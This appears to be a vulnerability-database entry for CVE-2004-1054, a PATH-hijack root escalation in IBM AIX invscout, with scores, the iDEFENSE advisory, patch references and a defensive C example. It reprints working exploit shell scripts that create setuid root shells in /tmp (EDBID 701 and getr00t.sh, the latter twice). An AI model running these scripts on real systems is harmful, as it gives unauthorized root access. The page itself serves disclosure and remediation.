CVE-2004-1054
CVSS7.2
Published: 2005-01-10 00:00:00
Revised: 2008-09-10 15:28:52

[Original text] Untrusted execution path vulnerability in invscout in IBM AIX 5.1.0, 5.2.0, and 5.3.0 allows local users to gain privileges by modifying the PATH environment variable to point to a malicious "uname" program, which is executed from lsvpd after lsvpd has been invoked by invscout.


[CNNVD] IBM AIX lsvpd Local Privilege Escalation Vulnerability (CNNVD-200501-044)

        AIX is IBM's UNIX operating system.
        lsvpd in IBM AIX 5.1.0, 5.2.0 and 5.3.0 has a local privilege escalation vulnerability.
        A local user can modify the PATH environment variable to point to a malicious "uname" program, which is executed via lsvpd, thereby gaining system privileges.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:5.1    IBM AIX 5.1
cpe:/o:ibm:aix:5.3_l  IBM AIX 5.3 L
cpe:/o:ibm:aix:5.2    IBM AIX 5.2
cpe:/o:ibm:aix:5.1l   IBM AIX 5.1L
cpe:/o:ibm:aix:5.3    IBM AIX 5.3
cpe:/o:ibm:aix:5.2.2  IBM AIX 5.2.2
cpe:/o:ibm:aix:5.2_l  IBM AIX 5.2 L

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1054
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1054
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-044
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/18619
(UNKNOWN)  XF  aix-invscout-gain-privileges(18619)
http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20041220 IBM AIX invscout Local Command Execution Vulnerability
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64976&apar=only
(UNKNOWN)  AIXAPAR  IY64976
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64852&apar=only
(UNKNOWN)  AIXAPAR  IY64852
http://www-1.ibm.com/support/search.wss?rs=0&q=IY64820&apar=only
(UNKNOWN)  AIXAPAR  IY64820

- Vulnerability information

IBM AIX lsvpd Local Privilege Escalation Vulnerability
High risk  Insufficient data
2005-01-10 00:00:00 2005-10-20 00:00:00
Local
        AIX is IBM's UNIX operating system.
        lsvpd in IBM AIX 5.1.0, 5.2.0 and 5.3.0 has a local privilege escalation vulnerability.
        A local user can modify the PATH environment variable to point to a malicious "uname" program, which is executed via lsvpd, thereby gaining system privileges.

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue; patch download link:
        http://www-01.ibm.com/support/docview.wss?uid=isg1IY64852

- Vulnerability information (701)

AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution (EDBID:701)
aix local
2004-12-21 Verified
0 cees-bart
N/A [Click to download]
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]
		

- Vulnerability information (898)

AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability (EDBID:898)
aix local
2005-03-25 Verified
0 ri0t
N/A [Click to download]
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]
		

- Vulnerability information (F36794)

getr00t.sh (PacketStormID:F36794)
2005-03-25 00:00:00
ri0t  
exploit
aix
CVE-2004-1054
[Click to download]

This is a simple script automating the equally simple exploitation of a trusted path bug in AIX. The problem lies in the invscout program.

#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh 
    

- Vulnerability information (F35455)

iDEFENSE Security Advisory 2004-12-20.1 (PacketStormID:F35455)
2004-12-31 00:00:00
iDefense Labs  idefense.com
advisory,arbitrary,local,root
aix
CVE-2004-1054
[Click to download]

iDEFENSE Security Advisory 12.20.2004-1 - Local exploitation of an untrusted path vulnerability in the invscout command included by default in multiple versions of IBM Corp.'s AIX could allow attackers to execute arbitrary code as the root user. Verified in version 5.2.

IBM AIX invscout Local Command Execution Vulnerability

iDEFENSE Security Advisory 12.20.04
www.idefense.com/application/poi/display?id=171&type=vulnerabilities
December 20, 2004

I. BACKGROUND

The invscout program is a setuid root application, installed by default 
under newer versions of IBM AIX, that surveys the host system for
currently installed microcode or Vital Product Data (VPD).

II. DESCRIPTION

Local exploitation of an untrusted path vulnerability in the invscout 
command included by default in multiple versions of IBM Corp.'s AIX 
could allow attackers to execute arbitrary code as the root user. 

During execution, invscout invokes an external application ("lsvpd") 
without dropping privileges. This application in turn invokes another 
external application ("uname"), while trusting the user-specified PATH 
environment variable. As root privileges are not dropped before this 
sequence of execution occurs, it is possible for an attacker to gain 
root access by specifying a controlled path and creating a malicious 
binary within that path. To exploit the vulnerability, an attacker needs
only to create an executable file called "uname" that contains malicious
code, set the PATH variable to the current directory and execute
/usr/sbin/invscout.

III. ANALYSIS

Exploitation of this vulnerability allows local attackers to gain
increased privileges. Successful exploitation requires a local account
and a writable directory. This directory can be the user's home
directory, or even the /tmp directory. Exploitation does not require
any knowledge of application internals, making privilege escalation
trivial, even for unskilled attackers.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in IBM AIX 
version 5.2.0. 

V. WORKAROUND

Only allow trusted users local access to security critical systems. 
Alternately, remove the setuid bit from invscout using chmod u-s 
/usr/sbin/invscout.

VI. VENDOR RESPONSE

"IBM provides the following fixes:

   APAR number for AIX 5.1.0: IY64852 (available)
   APAR number for AIX 5.2.0: IY64976 (available)
   APAR number for AIX 5.3.0: IY64820 (available)

NOTE: Affected customers are urged to upgrade to 5.1.0, 5.2.0 or 5.3.0
at the latest maintenance level."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-1054 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/12/2004 Initial vendor notification
11/18/2004 Initial vendor response
12/20/2004 Coordinated public disclosure

IX. CREDIT

iDEFENSE Labs is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
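The advisory above pins the defect on two things happening together: invscout keeps root privileges while it runs lsvpd, and lsvpd then locates "uname" through the caller's PATH. The following C program is an added example (not code from IBM, iDEFENSE, or this database) showing how a privileged helper should run an external command instead: it checks the inherited PATH for relative or empty elements, starts the child by absolute path with a freshly built environment holding only a fixed PATH, and drops setuid privileges in the child before exec. TRUSTED_PATH, path_is_trusted, drop_privileges and run_with_trusted_env are names chosen for this example; the "./" PATH value in main is constructed to mirror what the published scripts set.

```c
/* Added example: running a child command from a privileged program without
 * trusting the caller's PATH. Not IBM's or iDEFENSE's code. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed search path handed to any child of a privileged program (assumed). */
#define TRUSTED_PATH "/usr/bin:/usr/sbin:/bin:/sbin"

/* Returns 1 when every element of a PATH value is an absolute directory;
 * 0 for NULL or empty values, empty elements ("a::b", trailing ':'),
 * or relative elements such as "." or "./" (the pattern in the exploits). */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 0;               /* empty or relative element */
        if (colon == NULL)
            return 1;
        p = colon + 1;
    }
}

/* Permanently give up setuid/setgid privileges: effective ids become the
 * real ids. Returns 0 on success, -1 on failure. No-op when not setuid. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    return 0;
}

/* Runs prog (which must be an absolute path) with argv in an environment
 * that contains only PATH=TRUSTED_PATH, with privileges dropped in the
 * child. Returns the child's exit status, or -1 on error or refusal. */
int run_with_trusted_env(const char *prog, char *const argv[])
{
    if (prog == NULL || prog[0] != '/')
        return -1;                  /* never let exec search PATH */

    char *const envp[] = { "PATH=" TRUSTED_PATH, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(127);
        execve(prog, argv, envp);   /* absolute path, clean environment */
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed caller environment: PATH pointing at the current dir,
     * as in the published scripts. The check flags it. */
    const char *caller_path = "./";
    printf("caller PATH \"%s\" %s trusted\n", caller_path,
           path_is_trusted(caller_path) ? "is" : "is NOT");

    /* Run uname by absolute path with the trusted environment regardless
     * of what the caller set; a "uname" file in the cwd is never reached. */
    char *const argv[] = { "uname", "-s", NULL };
    int rc = run_with_trusted_env("/usr/bin/uname", argv);
    printf("/usr/bin/uname exited with %d\n", rc);
    return 0;
}
```

path_is_trusted is the audit-time check (refuse to run or log when a setuid program inherits a suspicious PATH); run_with_trusted_env is the fix itself, and is what invscout/lsvpd would have needed regardless of the check, since resetting the environment and using absolute paths removes the caller's influence entirely. Removing the setuid bit, the advisory's workaround, makes drop_privileges a no-op but also removes the program's intended capability.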
    

- Vulnerability information

12531
IBM AIX invscout Path Subversion Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

AIX invscout contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the program calls lsvpd without dropping privileges. lsvpd then calls 'uname' while trusting the user specified path, allowing the user to trick the program into running a custom 'uname' program. This flaw may lead to a loss of Integrity.

- Timeline

2004-12-20 Unknown
2005-03-25 Unknown

- Solution

Install the appropriate patch supplied by IBM, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the suid bit from the /usr/sbin/invscout binary

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

IBM AIX LSVPD Local Privilege Escalation Vulnerability
Unknown 12061
No Yes
2004-12-21 12:00:00 2009-07-12 09:26:00
Discovery of this vulnerability is credited to iDEFENSE Labs.

- Affected program versions

IBM AIX 5.3 L
IBM AIX 5.2.2
IBM AIX 5.2 L
IBM AIX 5.1 L
IBM AIX 5.3
IBM AIX 5.2
IBM AIX 5.1

- Vulnerability discussion

The AIX 'lsvpd' utility is reported prone to an unspecified local privilege escalation vulnerability. The vendor describes that this vulnerability results from an insecure path handling issue.

Reports indicate that this issue may be exploited by any local user through the 'invscout' utility.

- Exploit

No exploit is required.

- Solution

The vendor has released an advisory and APARs to address this vulnerability, please see the referenced advisory for further detail in regards to obtaining and installing appropriate APARs.


IBM AIX 5.1

IBM AIX 5.2

IBM AIX 5.3

- Related references

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.